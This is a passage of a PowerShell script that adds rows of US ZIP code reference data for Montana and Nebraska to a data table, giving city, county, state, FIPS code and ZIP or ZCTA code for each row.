$Cities.Rows.Add("Galata","Liberty","Montana","MT","30","59444") + $null = $Cities.Rows.Add("Geraldine","Chouteau","Montana","MT","30","59446") + $null = $Cities.Rows.Add("Geyser","Judith Basin","Montana","MT","30","59447") + $null = $Cities.Rows.Add("Heart butte","Pondera","Montana","MT","30","59448") + $null = $Cities.Rows.Add("Highwood","Chouteau","Montana","MT","30","59450") + $null = $Cities.Rows.Add("Hilger","Fergus","Montana","MT","30","59451") + $null = $Cities.Rows.Add("Utica","Judith Basin","Montana","MT","30","59452") + $null = $Cities.Rows.Add("Judith gap","Wheatland","Montana","MT","30","59453") + $null = $Cities.Rows.Add("Kevin","Toole","Montana","MT","30","59454") + $null = $Cities.Rows.Add("Ledger","Toole","Montana","MT","30","59456") + $null = $Cities.Rows.Add("Lewistown","Fergus","Montana","MT","30","59457") + $null = $Cities.Rows.Add("Loma","Chouteau","Montana","MT","30","59460") + $null = $Cities.Rows.Add("Moccasin","Judith Basin","Montana","MT","30","59462") + $null = $Cities.Rows.Add("Monarch","Cascade","Montana","MT","30","59463") + $null = $Cities.Rows.Add("Moore","Fergus","Montana","MT","30","59464") + $null = $Cities.Rows.Add("Neihart","Cascade","Montana","MT","30","59465") + $null = $Cities.Rows.Add("Oilmont","Toole","Montana","MT","30","59466") + $null = $Cities.Rows.Add("Pendroy","Teton","Montana","MT","30","59467") + $null = $Cities.Rows.Add("Power","Teton","Montana","MT","30","59468") + $null = $Cities.Rows.Add("Raynesford","Judith Basin","Montana","MT","30","59469") + $null = $Cities.Rows.Add("Roy","Fergus","Montana","MT","30","59471") + $null = $Cities.Rows.Add("Sand coulee","Cascade","Montana","MT","30","59472") + $null = $Cities.Rows.Add("Shelby","Toole","Montana","MT","30","59474") + $null = $Cities.Rows.Add("Simms","Cascade","Montana","MT","30","59477") + $null = $Cities.Rows.Add("Stanford","Judith Basin","Montana","MT","30","59479") + $null = $Cities.Rows.Add("Stockett","Cascade","Montana","MT","30","59480") + $null = $Cities.Rows.Add("Sunburst","Toole","Montana","MT","30","59482") + $null = $Cities.Rows.Add("Sun river","Cascade","Montana","MT","30","59483") + $null = $Cities.Rows.Add("Sweetgrass","Toole","Montana","MT","30","59484") + $null = $Cities.Rows.Add("Ulm","Cascade","Montana","MT","30","59485") + $null = $Cities.Rows.Add("Valier","Pondera","Montana","MT","30","59486") + $null = $Cities.Rows.Add("Vaughn","Cascade","Montana","MT","30","59487") + $null = $Cities.Rows.Add("Zcta 594hh","Cascade","Montana","MT","30","594HH") + $null = $Cities.Rows.Add("Zcta 594xx","Glacier","Montana","MT","30","594XX") + $null = $Cities.Rows.Add("Havre","Hill","Montana","MT","30","59501") + $null = $Cities.Rows.Add("Big sandy","Chouteau","Montana","MT","30","59520") + $null = $Cities.Rows.Add("Box elder","Hill","Montana","MT","30","59521") + $null = $Cities.Rows.Add("Chester","Liberty","Montana","MT","30","59522") + $null = $Cities.Rows.Add("Chinook","Blaine","Montana","MT","30","59523") + $null = $Cities.Rows.Add("Dodson","Phillips","Montana","MT","30","59524") + $null = $Cities.Rows.Add("Gildford","Hill","Montana","MT","30","59525") + $null = $Cities.Rows.Add("Harlem","Blaine","Montana","MT","30","59526") + $null = $Cities.Rows.Add("Hays","Blaine","Montana","MT","30","59527") + $null = $Cities.Rows.Add("Hingham","Hill","Montana","MT","30","59528") + $null = $Cities.Rows.Add("Hogeland","Blaine","Montana","MT","30","59529") + $null = $Cities.Rows.Add("Inverness","Hill","Montana","MT","30","59530") + $null = $Cities.Rows.Add("Joplin","Liberty","Montana","MT","30","59531") + $null = $Cities.Rows.Add("Kremlin","Hill","Montana","MT","30","59532") + $null = $Cities.Rows.Add("Lloyd","Blaine","Montana","MT","30","59535") + $null = $Cities.Rows.Add("Loring","Phillips","Montana","MT","30","59537") + $null = $Cities.Rows.Add("Malta","Phillips","Montana","MT","30","59538") + $null = $Cities.Rows.Add("Rudyard","Hill","Montana","MT","30","59540") + $null = $Cities.Rows.Add("Turner","Blaine","Montana","MT","30","59542") + $null = $Cities.Rows.Add("Whitewater","Phillips","Montana","MT","30","59544") + $null = $Cities.Rows.Add("Whitlash","Liberty","Montana","MT","30","59545") + $null = $Cities.Rows.Add("Zortman","Phillips","Montana","MT","30","59546") + $null = $Cities.Rows.Add("Zurich","Blaine","Montana","MT","30","59547") + $null = $Cities.Rows.Add("Zcta 595hh","Chouteau","Montana","MT","30","595HH") + $null = $Cities.Rows.Add("Helena","Lewis and Clark","Montana","MT","30","59601") + $null = $Cities.Rows.Add("Helena","Lewis and Clark","Montana","MT","30","59602") + $null = $Cities.Rows.Add("Basin","Jefferson","Montana","MT","30","59631") + $null = $Cities.Rows.Add("Boulder","Jefferson","Montana","MT","30","59632") + $null = $Cities.Rows.Add("Canyon creek","Lewis and Clark","Montana","MT","30","59633") + $null = $Cities.Rows.Add("Montana city","Jefferson","Montana","MT","30","59634") + $null = $Cities.Rows.Add("East helena","Lewis and Clark","Montana","MT","30","59635") + $null = $Cities.Rows.Add("Fort harrison","Lewis and Clark","Montana","MT","30","59636") + $null = $Cities.Rows.Add("Jefferson city","Jefferson","Montana","MT","30","59638") + $null = $Cities.Rows.Add("Lincoln","Lewis and Clark","Montana","MT","30","59639") + $null = $Cities.Rows.Add("Marysville","Lewis and Clark","Montana","MT","30","59640") + $null = $Cities.Rows.Add("Ringling","Meagher","Montana","MT","30","59642") + $null = $Cities.Rows.Add("Toston","Broadwater","Montana","MT","30","59643") + $null = $Cities.Rows.Add("Townsend","Broadwater","Montana","MT","30","59644") + $null = $Cities.Rows.Add("White sulphur sp","Meagher","Montana","MT","30","59645") + $null = $Cities.Rows.Add("Wolf creek","Lewis and Clark","Montana","MT","30","59648") + $null = $Cities.Rows.Add("Zcta 596hh","Broadwater","Montana","MT","30","596HH") + $null = $Cities.Rows.Add("Zcta 596xx","Meagher","Montana","MT","30","596XX") + $null = $Cities.Rows.Add("Walkerville","Silver Bow","Montana","MT","30","59701") + $null = $Cities.Rows.Add("Alder","Madison","Montana","MT","30","59710") + $null = $Cities.Rows.Add("Anaconda","Deer Lodge","Montana","MT","30","59711") + $null = $Cities.Rows.Add("Avon","Powell","Montana","MT","30","59713") + $null = $Cities.Rows.Add("Belgrade","Gallatin","Montana","MT","30","59714") + $null = $Cities.Rows.Add("Bozeman","Gallatin","Montana","MT","30","59715") + $null = $Cities.Rows.Add("Big sky","Gallatin","Montana","MT","30","59716") + $null = $Cities.Rows.Add("Zcta 59718","Gallatin","Montana","MT","30","59718") + $null = $Cities.Rows.Add("Cameron","Madison","Montana","MT","30","59720") + $null = $Cities.Rows.Add("Cardwell","Jefferson","Montana","MT","30","59721") + $null = $Cities.Rows.Add("Deer lodge","Powell","Montana","MT","30","59722") + $null = $Cities.Rows.Add("Dillon","Beaverhead","Montana","MT","30","59725") + $null = $Cities.Rows.Add("Divide","Silver Bow","Montana","MT","30","59727") + $null = $Cities.Rows.Add("Elliston","Powell","Montana","MT","30","59728") + $null = $Cities.Rows.Add("Ennis","Madison","Montana","MT","30","59729") + $null = $Cities.Rows.Add("Gallatin gateway","Gallatin","Montana","MT","30","59730") + $null = $Cities.Rows.Add("Garrison","Powell","Montana","MT","30","59731") + $null = $Cities.Rows.Add("Gold creek","Powell","Montana","MT","30","59733") + $null = $Cities.Rows.Add("Harrison","Madison","Montana","MT","30","59735") + $null = $Cities.Rows.Add("Jackson","Beaverhead","Montana","MT","30","59736") + $null = $Cities.Rows.Add("Lima","Beaverhead","Montana","MT","30","59739") + $null = $Cities.Rows.Add("Mc allister","Madison","Montana","MT","30","59740") + $null = $Cities.Rows.Add("Manhattan","Gallatin","Montana","MT","30","59741") + $null = $Cities.Rows.Add("Melrose","Silver Bow","Montana","MT","30","59743") + $null = $Cities.Rows.Add("Norris","Madison","Montana","MT","30","59745") + $null = $Cities.Rows.Add("Polaris","Beaverhead","Montana","MT","30","59746") + $null = $Cities.Rows.Add("Pony","Madison","Montana","MT","30","59747") + $null = $Cities.Rows.Add("Ramsay","Silver Bow","Montana","MT","30","59748") + $null = $Cities.Rows.Add("Sheridan","Madison","Montana","MT","30","59749") + $null = $Cities.Rows.Add("Butte","Silver Bow","Montana","MT","30","59750") + $null = $Cities.Rows.Add("Silver star","Madison","Montana","MT","30","59751") + $null = $Cities.Rows.Add("Three forks","Gallatin","Montana","MT","30","59752") + $null = $Cities.Rows.Add("Twin bridges","Madison","Montana","MT","30","59754") + $null = $Cities.Rows.Add("Virginia city","Madison","Montana","MT","30","59755") + $null = $Cities.Rows.Add("Warmsprings","Deer Lodge","Montana","MT","30","59756") + $null = $Cities.Rows.Add("West yellowstone","Gallatin","Montana","MT","30","59758") + $null = $Cities.Rows.Add("Whitehall","Jefferson","Montana","MT","30","59759") + $null = $Cities.Rows.Add("Wisdom","Beaverhead","Montana","MT","30","59761") + $null = $Cities.Rows.Add("Wise river","Beaverhead","Montana","MT","30","59762") + $null = $Cities.Rows.Add("Zcta 597hh","Beaverhead","Montana","MT","30","597HH") + $null = $Cities.Rows.Add("Zcta 597xx","Gallatin","Montana","MT","30","597XX") + $null = $Cities.Rows.Add("Missoula","Missoula","Montana","MT","30","59801") + $null = $Cities.Rows.Add("Missoula","Missoula","Montana","MT","30","59802") + $null = $Cities.Rows.Add("Missoula","Missoula","Montana","MT","30","59803") + $null = $Cities.Rows.Add("Missoula","Missoula","Montana","MT","30","59804") + $null = $Cities.Rows.Add("Zcta 59808","Missoula","Montana","MT","30","59808") + $null = $Cities.Rows.Add("Alberton","Missoula","Montana","MT","30","59820") + $null = $Cities.Rows.Add("Arlee","Lake","Montana","MT","30","59821") + $null = $Cities.Rows.Add("Bonner","Missoula","Montana","MT","30","59823") + $null = $Cities.Rows.Add("Moiese","Lake","Montana","MT","30","59824") + $null = $Cities.Rows.Add("Clinton","Missoula","Montana","MT","30","59825") + $null = $Cities.Rows.Add("Condon","Missoula","Montana","MT","30","59826") + $null = $Cities.Rows.Add("Conner","Ravalli","Montana","MT","30","59827") + $null = $Cities.Rows.Add("Corvallis","Ravalli","Montana","MT","30","59828") + $null = $Cities.Rows.Add("Darby","Ravalli","Montana","MT","30","59829") + $null = $Cities.Rows.Add("Dixon","Sanders","Montana","MT","30","59831") + $null = $Cities.Rows.Add("Drummond","Granite","Montana","MT","30","59832") + $null = $Cities.Rows.Add("Florence","Ravalli","Montana","MT","30","59833") + $null = $Cities.Rows.Add("Frenchtown","Missoula","Montana","MT","30","59834") + $null = $Cities.Rows.Add("Greenough","Missoula","Montana","MT","30","59836") + $null = $Cities.Rows.Add("Hall","Granite","Montana","MT","30","59837") + $null = $Cities.Rows.Add("Hamilton","Ravalli","Montana","MT","30","59840") + $null = $Cities.Rows.Add("Pinesdale","Ravalli","Montana","MT","30","59841") + $null = $Cities.Rows.Add("Haugan","Mineral","Montana","MT","30","59842") + $null = $Cities.Rows.Add("Helmville","Powell","Montana","MT","30","59843") + $null = $Cities.Rows.Add("Heron","Sanders","Montana","MT","30","59844") + $null = $Cities.Rows.Add("Hot springs","Sanders","Montana","MT","30","59845") + $null = $Cities.Rows.Add("Huson","Missoula","Montana","MT","30","59846") + $null = $Cities.Rows.Add("Lolo","Missoula","Montana","MT","30","59847") + $null = $Cities.Rows.Add("Lonepine","Sanders","Montana","MT","30","59848") + $null = $Cities.Rows.Add("Milltown","Missoula","Montana","MT","30","59851") + $null = $Cities.Rows.Add("Noxon","Sanders","Montana","MT","30","59853") + $null = $Cities.Rows.Add("Ovando","Powell","Montana","MT","30","59854") + $null = $Cities.Rows.Add("Pablo","Lake","Montana","MT","30","59855") + $null = $Cities.Rows.Add("Philipsburg","Granite","Montana","MT","30","59858") + $null = $Cities.Rows.Add("Plains","Sanders","Montana","MT","30","59859") + $null = $Cities.Rows.Add("Polson","Lake","Montana","MT","30","59860") + $null = $Cities.Rows.Add("Ronan","Lake","Montana","MT","30","59864") + $null = $Cities.Rows.Add("Saint ignatius","Lake","Montana","MT","30","59865") + $null = $Cities.Rows.Add("Saint regis","Mineral","Montana","MT","30","59866") + $null = $Cities.Rows.Add("Saltese","Mineral","Montana","MT","30","59867") + $null = $Cities.Rows.Add("Seeley lake","Missoula","Montana","MT","30","59868") + $null = $Cities.Rows.Add("Stevensville","Ravalli","Montana","MT","30","59870") + $null = $Cities.Rows.Add("Sula","Ravalli","Montana","MT","30","59871") + $null = $Cities.Rows.Add("Superior","Mineral","Montana","MT","30","59872") + $null = $Cities.Rows.Add("Thompson falls","Sanders","Montana","MT","30","59873") + $null = $Cities.Rows.Add("Trout creek","Sanders","Montana","MT","30","59874") + $null = $Cities.Rows.Add("Victor","Ravalli","Montana","MT","30","59875") + $null = $Cities.Rows.Add("Zcta 598hh","Lake","Montana","MT","30","598HH") + $null = $Cities.Rows.Add("Zcta 598xx","Mineral","Montana","MT","30","598XX") + $null = $Cities.Rows.Add("Evergreen","Flathead","Montana","MT","30","59901") + $null = $Cities.Rows.Add("Big arm","Lake","Montana","MT","30","59910") + $null = $Cities.Rows.Add("Swan lake","Flathead","Montana","MT","30","59911") + $null = $Cities.Rows.Add("Columbia falls","Flathead","Montana","MT","30","59912") + $null = $Cities.Rows.Add("Coram","Flathead","Montana","MT","30","59913") + $null = $Cities.Rows.Add("Dayton","Lake","Montana","MT","30","59914") + $null = $Cities.Rows.Add("Elmo","Lake","Montana","MT","30","59915") + $null = $Cities.Rows.Add("Essex","Flathead","Montana","MT","30","59916") + $null = $Cities.Rows.Add("Eureka","Lincoln","Montana","MT","30","59917") + $null = $Cities.Rows.Add("Fortine","Lincoln","Montana","MT","30","59918") + $null = $Cities.Rows.Add("Hungry horse","Flathead","Montana","MT","30","59919") + $null = $Cities.Rows.Add("Kila","Flathead","Montana","MT","30","59920") + $null = $Cities.Rows.Add("Lake mc donald","Flathead","Montana","MT","30","59921") + $null = $Cities.Rows.Add("Lakeside","Flathead","Montana","MT","30","59922") + $null = $Cities.Rows.Add("Libby","Lincoln","Montana","MT","30","59923") + $null = $Cities.Rows.Add("Marion","Flathead","Montana","MT","30","59925") + $null = $Cities.Rows.Add("Martin city","Flathead","Montana","MT","30","59926") + $null = $Cities.Rows.Add("Olney","Flathead","Montana","MT","30","59927") + $null = $Cities.Rows.Add("Polebridge","Flathead","Montana","MT","30","59928") + $null = $Cities.Rows.Add("Proctor","Lake","Montana","MT","30","59929") + $null = $Cities.Rows.Add("Rexford","Lincoln","Montana","MT","30","59930") + $null = $Cities.Rows.Add("Rollins","Lake","Montana","MT","30","59931") + $null = $Cities.Rows.Add("Somers","Flathead","Montana","MT","30","59932") + $null = $Cities.Rows.Add("Stryker","Lincoln","Montana","MT","30","59933") + $null = $Cities.Rows.Add("Trego","Lincoln","Montana","MT","30","59934") + $null = $Cities.Rows.Add("Troy","Lincoln","Montana","MT","30","59935") + $null = $Cities.Rows.Add("West glacier","Flathead","Montana","MT","30","59936") + $null = $Cities.Rows.Add("Whitefish","Flathead","Montana","MT","30","59937") + $null = $Cities.Rows.Add("Zcta 599hh","Flathead","Montana","MT","30","599HH") + $null = $Cities.Rows.Add("Abie","Butler","Nebraska","NE","31","68001") + $null = $Cities.Rows.Add("Arlington","Washington","Nebraska","NE","31","68002") + $null = $Cities.Rows.Add("Ashland","Saunders","Nebraska","NE","31","68003") + $null = $Cities.Rows.Add("Bancroft","Cuming","Nebraska","NE","31","68004") + $null = $Cities.Rows.Add("Bellevue","Sarpy","Nebraska","NE","31","68005") + $null = $Cities.Rows.Add("Bennington","Douglas","Nebraska","NE","31","68007") + $null = $Cities.Rows.Add("Blair","Washington","Nebraska","NE","31","68008") + $null = $Cities.Rows.Add("Boys town","Douglas","Nebraska","NE","31","68010") + $null = $Cities.Rows.Add("Bruno","Butler","Nebraska","NE","31","68014") + $null = $Cities.Rows.Add("Cedar bluffs","Saunders","Nebraska","NE","31","68015") + $null = $Cities.Rows.Add("Cedar creek","Cass","Nebraska","NE","31","68016") + $null = $Cities.Rows.Add("Ceresco","Saunders","Nebraska","NE","31","68017") + $null = $Cities.Rows.Add("Colon","Saunders","Nebraska","NE","31","68018") + $null = $Cities.Rows.Add("Craig","Burt","Nebraska","NE","31","68019") + $null = $Cities.Rows.Add("Decatur","Burt","Nebraska","NE","31","68020") + $null = $Cities.Rows.Add("Elkhorn","Douglas","Nebraska","NE","31","68022") + $null = $Cities.Rows.Add("Fort calhoun","Washington","Nebraska","NE","31","68023") + $null = $Cities.Rows.Add("Fremont","Dodge","Nebraska","NE","31","68025") + $null = $Cities.Rows.Add("Gretna","Sarpy","Nebraska","NE","31","68028") + $null = $Cities.Rows.Add("Herman","Washington","Nebraska","NE","31","68029") + $null = $Cities.Rows.Add("Homer","Dakota","Nebraska","NE","31","68030") + $null = $Cities.Rows.Add("Hooper","Dodge","Nebraska","NE","31","68031") + $null = $Cities.Rows.Add("Ithaca","Saunders","Nebraska","NE","31","68033") + $null = $Cities.Rows.Add("Kennard","Washington","Nebraska","NE","31","68034") + $null = $Cities.Rows.Add("Leshara","Saunders","Nebraska","NE","31","68035") + $null = $Cities.Rows.Add("Linwood","Butler","Nebraska","NE","31","68036") + $null = $Cities.Rows.Add("Louisville","Cass","Nebraska","NE","31","68037") + $null = $Cities.Rows.Add("Lyons","Burt","Nebraska","NE","31","68038") + $null = $Cities.Rows.Add("Macy","Thurston","Nebraska","NE","31","68039") + $null = $Cities.Rows.Add("Malmo","Saunders","Nebraska","NE","31","68040") + $null = $Cities.Rows.Add("Mead","Saunders","Nebraska","NE","31","68041") + $null = $Cities.Rows.Add("Memphis","Saunders","Nebraska","NE","31","68042") + $null = $Cities.Rows.Add("Nickerson","Dodge","Nebraska","NE","31","68044") + $null = $Cities.Rows.Add("Oakland","Burt","Nebraska","NE","31","68045") + $null = $Cities.Rows.Add("Papillion","Sarpy","Nebraska","NE","31","68046") + $null = $Cities.Rows.Add("Pender","Thurston","Nebraska","NE","31","68047") + $null = $Cities.Rows.Add("Plattsmouth","Cass","Nebraska","NE","31","68048") + $null = $Cities.Rows.Add("Prague","Saunders","Nebraska","NE","31","68050") + $null = $Cities.Rows.Add("Richfield","Sarpy","Nebraska","NE","31","68054") + $null = $Cities.Rows.Add("Rosalie","Thurston","Nebraska","NE","31","68055") + $null = $Cities.Rows.Add("Scribner","Dodge","Nebraska","NE","31","68057") + $null = $Cities.Rows.Add("South bend","Cass","Nebraska","NE","31","68058") + $null = $Cities.Rows.Add("Springfield","Sarpy","Nebraska","NE","31","68059") + $null = $Cities.Rows.Add("Tekamah","Burt","Nebraska","NE","31","68061") + $null = $Cities.Rows.Add("Thurston","Thurston","Nebraska","NE","31","68062") + $null = $Cities.Rows.Add("Uehling","Dodge","Nebraska","NE","31","68063") + $null = $Cities.Rows.Add("Valley","Douglas","Nebraska","NE","31","68064") + $null = $Cities.Rows.Add("Valparaiso","Saunders","Nebraska","NE","31","68065") + $null = $Cities.Rows.Add("Wahoo","Saunders","Nebraska","NE","31","68066") + $null = $Cities.Rows.Add("Walthill","Thurston","Nebraska","NE","31","68067") + $null = $Cities.Rows.Add("Washington","Washington","Nebraska","NE","31","68068") + $null = $Cities.Rows.Add("Waterloo","Douglas","Nebraska","NE","31","68069") + $null = $Cities.Rows.Add("Weston","Saunders","Nebraska","NE","31","68070") + $null = $Cities.Rows.Add("Winnebago","Thurston","Nebraska","NE","31","68071") + $null = $Cities.Rows.Add("Yutan","Saunders","Nebraska","NE","31","68073") + $null = $Cities.Rows.Add("Zcta 680hh","Burt","Nebraska","NE","31","680HH") + $null = $Cities.Rows.Add("Omaha","Douglas","Nebraska","NE","31","68102") + $null = $Cities.Rows.Add("Omaha","Douglas","Nebraska","NE","31","68104") + $null = $Cities.Rows.Add("Omaha","Douglas","Nebraska","NE","31","68105") + $null = $Cities.Rows.Add("Omaha","Douglas","Nebraska","NE","31","68106") + $null = $Cities.Rows.Add("Omaha","Douglas","Nebraska","NE","31","68107") + $null = $Cities.Rows.Add("Omaha","Douglas","Nebraska","NE","31","68108") + $null = $Cities.Rows.Add("Omaha","Douglas","Nebraska","NE","31","68110") + $null = $Cities.Rows.Add("Omaha","Douglas","Nebraska","NE","31","68111") + $null = $Cities.Rows.Add("Omaha","Douglas","Nebraska","NE","31","68112") + $null = $Cities.Rows.Add("Offutt a f b","Sarpy","Nebraska","NE","31","68113") + $null = $Cities.Rows.Add("Omaha","Douglas","Nebraska","NE","31","68114") + $null = $Cities.Rows.Add("Omaha","Douglas","Nebraska","NE","31","68116") + $null = $Cities.Rows.Add("Omaha","Douglas","Nebraska","NE","31","68117") + $null = $Cities.Rows.Add("Omaha","Douglas","Nebraska","NE","31","68118") + $null = $Cities.Rows.Add("Omaha","Douglas","Nebraska","NE","31","68122") + $null = $Cities.Rows.Add("Omaha","Sarpy","Nebraska","NE","31","68123") + $null = $Cities.Rows.Add("Omaha","Douglas","Nebraska","NE","31","68124") + $null = $Cities.Rows.Add("Ralston","Douglas","Nebraska","NE","31","68127") + $null = $Cities.Rows.Add("Papillion","Sarpy","Nebraska","NE","31","68128") + $null = $Cities.Rows.Add("Omaha","Douglas","Nebraska","NE","31","68130") + $null = $Cities.Rows.Add("Omaha","Douglas","Nebraska","NE","31","68131") + $null = $Cities.Rows.Add("Omaha","Douglas","Nebraska","NE","31","68132") + $null = $Cities.Rows.Add("Papillion","Sarpy","Nebraska","NE","31","68133") + $null = $Cities.Rows.Add("Omaha","Douglas","Nebraska","NE","31","68134") + $null = $Cities.Rows.Add("Omaha","Douglas","Nebraska","NE","31","68135") + $null = $Cities.Rows.Add("Omaha","Sarpy","Nebraska","NE","31","68136") + $null = $Cities.Rows.Add("Millard","Douglas","Nebraska","NE","31","68137") + $null = $Cities.Rows.Add("Papillion","Sarpy","Nebraska","NE","31","68138") + $null = $Cities.Rows.Add("Omaha","Douglas","Nebraska","NE","31","68142") + $null = $Cities.Rows.Add("Millard","Douglas","Nebraska","NE","31","68144") + $null = $Cities.Rows.Add("Omaha","Sarpy","Nebraska","NE","31","68147") + $null = $Cities.Rows.Add("Omaha","Douglas","Nebraska","NE","31","68152") + $null = $Cities.Rows.Add("Omaha","Douglas","Nebraska","NE","31","68154") + $null = $Cities.Rows.Add("Papillion","Sarpy","Nebraska","NE","31","68157") + $null = $Cities.Rows.Add("Omaha","Douglas","Nebraska","NE","31","68164") + $null = $Cities.Rows.Add("Zcta 681hh","Douglas","Nebraska","NE","31","681HH") + $null = $Cities.Rows.Add("Adams","Gage","Nebraska","NE","31","68301") + $null = $Cities.Rows.Add("Alexandria","Thayer","Nebraska","NE","31","68303") + $null = $Cities.Rows.Add("Alvo","Cass","Nebraska","NE","31","68304") + $null = $Cities.Rows.Add("Auburn","Nemaha","Nebraska","NE","31","68305") + $null = $Cities.Rows.Add("Avoca","Cass","Nebraska","NE","31","68307") + $null = $Cities.Rows.Add("Barneston","Gage","Nebraska","NE","31","68309") + $null = $Cities.Rows.Add("Beatrice","Gage","Nebraska","NE","31","68310") + $null = $Cities.Rows.Add("Beaver crossing","Seward","Nebraska","NE","31","68313") + $null = $Cities.Rows.Add("Bee","Seward","Nebraska","NE","31","68314") + $null = $Cities.Rows.Add("Belvidere","Thayer","Nebraska","NE","31","68315") + $null = $Cities.Rows.Add("Benedict","York","Nebraska","NE","31","68316") + $null = $Cities.Rows.Add("Bennet","Lancaster","Nebraska","NE","31","68317") + $null = $Cities.Rows.Add("Blue springs","Gage","Nebraska","NE","31","68318") + $null = $Cities.Rows.Add("Bradshaw","York","Nebraska","NE","31","68319") + $null = $Cities.Rows.Add("Brock","Nemaha","Nebraska","NE","31","68320") + $null = $Cities.Rows.Add("Brownville","Nemaha","Nebraska","NE","31","68321") + $null = $Cities.Rows.Add("Bruning","Thayer","Nebraska","NE","31","68322") + $null = $Cities.Rows.Add("Burchard","Pawnee","Nebraska","NE","31","68323") + $null = $Cities.Rows.Add("Burr","Otoe","Nebraska","NE","31","68324") + $null = $Cities.Rows.Add("Byron","Thayer","Nebraska","NE","31","68325") + $null = $Cities.Rows.Add("Carleton","Thayer","Nebraska","NE","31","68326") + $null = $Cities.Rows.Add("Chester","Thayer","Nebraska","NE","31","68327") + $null = $Cities.Rows.Add("Clatonia","Gage","Nebraska","NE","31","68328") + $null = $Cities.Rows.Add("Cook","Johnson","Nebraska","NE","31","68329") + $null = $Cities.Rows.Add("Cordova","Seward","Nebraska","NE","31","68330") + $null = $Cities.Rows.Add("Cortland","Gage","Nebraska","NE","31","68331") + $null = $Cities.Rows.Add("Crab orchard","Johnson","Nebraska","NE","31","68332") + $null = $Cities.Rows.Add("Crete","Saline","Nebraska","NE","31","68333") + $null = $Cities.Rows.Add("Davenport","Thayer","Nebraska","NE","31","68335") + $null = $Cities.Rows.Add("Davey","Lancaster","Nebraska","NE","31","68336") + $null = $Cities.Rows.Add("Dawson","Richardson","Nebraska","NE","31","68337") + $null = $Cities.Rows.Add("Daykin","Jefferson","Nebraska","NE","31","68338") + $null = $Cities.Rows.Add("Denton","Lancaster","Nebraska","NE","31","68339") + $null = $Cities.Rows.Add("Deshler","Thayer","Nebraska","NE","31","68340") + $null = $Cities.Rows.Add("De witt","Saline","Nebraska","NE","31","68341") + $null = $Cities.Rows.Add("Diller","Jefferson","Nebraska","NE","31","68342") + $null = $Cities.Rows.Add("Dorchester","Saline","Nebraska","NE","31","68343") + $null = $Cities.Rows.Add("Douglas","Otoe","Nebraska","NE","31","68344") + $null = $Cities.Rows.Add("Du bois","Pawnee","Nebraska","NE","31","68345") + $null = $Cities.Rows.Add("Dunbar","Otoe","Nebraska","NE","31","68346") + $null = $Cities.Rows.Add("Eagle","Cass","Nebraska","NE","31","68347") + $null = $Cities.Rows.Add("Elk creek","Johnson","Nebraska","NE","31","68348") + $null = $Cities.Rows.Add("Elmwood","Cass","Nebraska","NE","31","68349") + $null = $Cities.Rows.Add("Endicott","Jefferson","Nebraska","NE","31","68350") + $null = $Cities.Rows.Add("Exeter","Fillmore","Nebraska","NE","31","68351") + $null = $Cities.Rows.Add("Fairbury","Jefferson","Nebraska","NE","31","68352") + $null = $Cities.Rows.Add("Fairmont","Fillmore","Nebraska","NE","31","68354") + $null = $Cities.Rows.Add("Falls city","Richardson","Nebraska","NE","31","68355") + $null = $Cities.Rows.Add("Filley","Gage","Nebraska","NE","31","68357") + $null = $Cities.Rows.Add("Firth","Lancaster","Nebraska","NE","31","68358") + $null = $Cities.Rows.Add("Friend","Saline","Nebraska","NE","31","68359") + $null = $Cities.Rows.Add("Garland","Seward","Nebraska","NE","31","68360") + $null = $Cities.Rows.Add("Geneva","Fillmore","Nebraska","NE","31","68361") + $null = $Cities.Rows.Add("Gilead","Thayer","Nebraska","NE","31","68362") + $null = $Cities.Rows.Add("Goehner","Seward","Nebraska","NE","31","68364") + $null = $Cities.Rows.Add("Grafton","Fillmore","Nebraska","NE","31","68365") + $null = $Cities.Rows.Add("Greenwood","Cass","Nebraska","NE","31","68366") + $null = $Cities.Rows.Add("Gresham","York","Nebraska","NE","31","68367") + $null = $Cities.Rows.Add("Hallam","Lancaster","Nebraska","NE","31","68368") + $null = $Cities.Rows.Add("Hebron","Thayer","Nebraska","NE","31","68370") + $null = $Cities.Rows.Add("Henderson","York","Nebraska","NE","31","68371") + $null = $Cities.Rows.Add("Holland","Lancaster","Nebraska","NE","31","68372") + $null = $Cities.Rows.Add("Holmesville","Gage","Nebraska","NE","31","68374") + $null = $Cities.Rows.Add("Hubbell","Thayer","Nebraska","NE","31","68375") + $null = $Cities.Rows.Add("Humboldt","Richardson","Nebraska","NE","31","68376") + $null = $Cities.Rows.Add("Jansen","Jefferson","Nebraska","NE","31","68377") + $null = $Cities.Rows.Add("Johnson","Nemaha","Nebraska","NE","31","68378") + $null = $Cities.Rows.Add("Lewiston","Pawnee","Nebraska","NE","31","68380") + $null = $Cities.Rows.Add("Liberty","Gage","Nebraska","NE","31","68381") + $null = $Cities.Rows.Add("Zcta 683hh","Richardson","Nebraska","NE","31","683HH") + $null = $Cities.Rows.Add("Mc cool junction","York","Nebraska","NE","31","68401") + $null = $Cities.Rows.Add("Malcolm","Lancaster","Nebraska","NE","31","68402") + $null = $Cities.Rows.Add("Manley","Cass","Nebraska","NE","31","68403") + $null = $Cities.Rows.Add("Martell","Lancaster","Nebraska","NE","31","68404") + $null = $Cities.Rows.Add("Milford","Seward","Nebraska","NE","31","68405") + $null = $Cities.Rows.Add("Milligan","Fillmore","Nebraska","NE","31","68406") + $null = $Cities.Rows.Add("Murdock","Cass","Nebraska","NE","31","68407") + $null = $Cities.Rows.Add("Murray","Cass","Nebraska","NE","31","68409") + $null = $Cities.Rows.Add("Nebraska city","Otoe","Nebraska","NE","31","68410") + $null = $Cities.Rows.Add("Nehawka","Cass","Nebraska","NE","31","68413") + $null = $Cities.Rows.Add("Nemaha","Nemaha","Nebraska","NE","31","68414") + $null = $Cities.Rows.Add("Odell","Gage","Nebraska","NE","31","68415") + $null = $Cities.Rows.Add("Ohiowa","Fillmore","Nebraska","NE","31","68416") + $null = $Cities.Rows.Add("Otoe","Otoe","Nebraska","NE","31","68417") + $null = $Cities.Rows.Add("Palmyra","Otoe","Nebraska","NE","31","68418") + $null = $Cities.Rows.Add("Panama","Lancaster","Nebraska","NE","31","68419") + $null = $Cities.Rows.Add("Pawnee city","Pawnee","Nebraska","NE","31","68420") + $null = $Cities.Rows.Add("Peru","Nemaha","Nebraska","NE","31","68421") + $null = $Cities.Rows.Add("Pickrell","Gage","Nebraska","NE","31","68422") + $null = $Cities.Rows.Add("Pleasant dale","Seward","Nebraska","NE","31","68423") + $null = $Cities.Rows.Add("Plymouth","Jefferson","Nebraska","NE","31","68424") + $null = $Cities.Rows.Add("Agnew","Lancaster","Nebraska","NE","31","68428") + $null = $Cities.Rows.Add("Roca","Lancaster","Nebraska","NE","31","68430") + $null = 